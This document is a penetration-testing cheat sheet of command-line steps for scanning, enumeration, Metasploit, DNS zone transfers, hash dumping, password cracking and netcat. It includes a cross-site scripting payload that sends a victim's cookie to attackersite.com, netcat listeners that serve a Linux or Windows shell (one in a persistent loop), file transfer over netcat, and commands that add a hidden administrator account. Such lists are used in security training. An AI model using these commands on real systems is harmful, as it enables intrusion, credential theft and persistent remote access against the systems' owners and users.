1. LINUX
   1. # gcc <exploit source> -o <outfile>
      compile an exploit; run it with ./<outfile>
   2. # whoami
   3. # id
   4. # su -
      become root
2. WINDOWS
   1. c:\>enum -U [target]
      enumerate user accounts
   2. c:\>enum -P [target]
      enumerate password policy
   3. c:\>enum -G [target]
      enumerate groups
   4. c:\>enum -UGP [target]
      enumerate all of the above combined
   5. c:\>enum -D -u [user] -f [wordfile] [target]
      run dictionary attack
3. NMAP
   1. # nmap -A <target> --reason -oN <file>
      run "aggressive" scan, normal-format output to a file
   2. # nmap -p <port/s> <target> --reason
      scan specific ports on target
   3. # nmap -sV -p <port/s> <target> --reason
      version scan
   4. useful options
      --reason - show why a port is reported in its state (target's response)
      --packet-trace - show packet details
      --traceroute - show network topology to target
4. Metasploit
   1. # msfconsole
   2. > show exploits
   3. > search [parameter]
   4. > show payloads
   5. > use /path/to/exploit
   6. > set PAYLOAD /path/to/payload
   7. > show options
   8. > set RHOST <target-ip>
   9. > exploit
   10. > sessions -l
   11. > sessions -i <session-id>
5. Hydan
   1. # echo "Hello" > hideme.txt
   2. # ./hydan ./ls hideme.txt > <outfile>
      hide
   3. # ./hydan-decode <stegofile>
      decode; enter password when prompted
6. DNS Interrogation
   1. c:\>nslookup
   2. > server <dns-server-ip>
   3. > ls -d target.tgt
   4. # dig @<target-dns-svr-ip> target.tgt -t AXFR
      attempt zone transfer from Linux CLI
7. CROSS-SITE Scripting Example
   1. http://website.net/search.php?word=<SCRIPT LANGUAGE=Javascript>alert("PWNED!");</SCRIPT>
      display alert "PWNED!"
   2. http://website.net/search.php?word=<SCRIPT LANGUAGE=Javascript>document.location='http://attackersite.com/cgi-bin/grub.cgi?'%2bdocument.cookie</SCRIPT>
8. PASSWORDS DUMP
   1. c:\> pwdump3 <target-ip> [outfile] [user]
      (will prompt for password)
      dumps password hashes from a remote machine
      only works if you have admin-level privileges on the remote machine
9. John the Ripper
   1. # unshadow /etc/passwd /etc/shadow > /tmp/combined
   2. # ./john /tmp/combined
   3. c:\> john <hashfile>
      under Windows
   4. remember to delete "john.pot" if restarting a cracking session from the beginning
10. WINDOWS Net Commands
   1. c:\>net user /add [user] [password]
   2. net localgroup administrators /add [user]
   3. net user [user] /delete
   4. net use * \\[target]\c$ [admin passwd] /u:[user]
      map local drive to remote with admin privileges
   5. net use * \\[target]\c$ [admin passwd] /u:[target-ip]\[user]
      mapping to server (Win2K3)
   6. net use * /d /y
      delete all net use sessions
11. NETCAT
   1. # nc -lnvp 7777
      create listener on port 7777
   2. # nc -nv <listener-ip> 7777
      connect to remote listener on 7777
   3. # nc -lnvp 7777 -e /bin/sh
      create listener and shovel a shell on Linux
   4. c:\> nc -lnvp 7777 -e cmd.exe
      create listener and shovel a shell on Windows
   5. # nc -lnvp 7777 > file.txt
      create listener, write whatever is received into file.txt
   6. # nc -nv <listener-ip> 7777 < file.txt
      connect to listener and send file.txt
      (the reverse direction also works: a listener started with < file.txt serves the file, and the connecting side redirects with > file.txt)
   7. # while [ 1 ]; do echo "Started"; nc -lnp [port] -e /bin/sh; done
      create persistent netcat listener with bash shell